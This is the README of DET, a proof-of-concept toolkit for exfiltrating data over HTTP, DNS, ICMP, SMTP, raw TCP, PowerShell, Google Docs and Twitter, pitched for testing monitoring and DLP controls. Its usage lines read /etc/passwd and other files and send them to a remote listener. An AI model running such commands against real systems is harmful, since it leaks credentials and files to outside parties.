Data Exfiltration Toolkit (DET)
DET (extensible) Data Exfiltration Toolkit
DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channels(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service. The idea was to create a generic toolkit to plug any kind of protocol/service to test implemented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.
Data Exfiltration ToolkitDET supports multiple protocols, listed here:
- HTTP(S)
- ICMP
- DNS
- SMTP/IMAP (eg. Gmail)
- Raw TCP
- PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
And other “services”:
- Google Docs (Unauthenticated)
- Twitter (Direct Messages)
Install
git clone https://github.com/sensepost/DET.git
cd DET
pip install -r requirements.txt –user
Configuration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json
Usage
Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and Gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns
Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and Gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP–exfil ‘C:\path\to\file.exe’
Copyright (c) 2016 SensePost
Source: https://github.com/PaulSec/